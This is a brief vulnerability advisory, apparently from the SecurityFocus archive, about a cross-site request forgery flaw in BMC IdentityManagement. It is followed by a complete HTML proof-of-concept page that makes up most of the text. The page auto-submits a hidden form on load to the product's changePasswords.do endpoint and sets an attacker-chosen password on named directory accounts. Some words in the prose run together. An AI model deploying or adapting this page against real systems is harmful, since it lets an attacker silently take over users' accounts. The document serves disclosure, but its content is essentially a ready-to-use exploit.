source: https://www.securityfocus.com/bid/53924/info
IdentityManagement is prone toa cross-site request-forgery vulnerability because the application fails toproperly validate HTTPrequests.
Exploitingthis issue may allow a remote attacker toperform certain actions in the context of an authorized user's session and gain unauthorized access tothe affected application; other attacks are also possible.<html><head><title>BMCIDMChangePWCSRFPoC</title></head><body onload="document.getElementById('CSRF').submit()"><form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"><input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000"/><input type="hidden" name="password" value="Abc123!"/><input type="hidden" name="passwordAgain" value="Abc123!"/><input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000"/></form></body></html>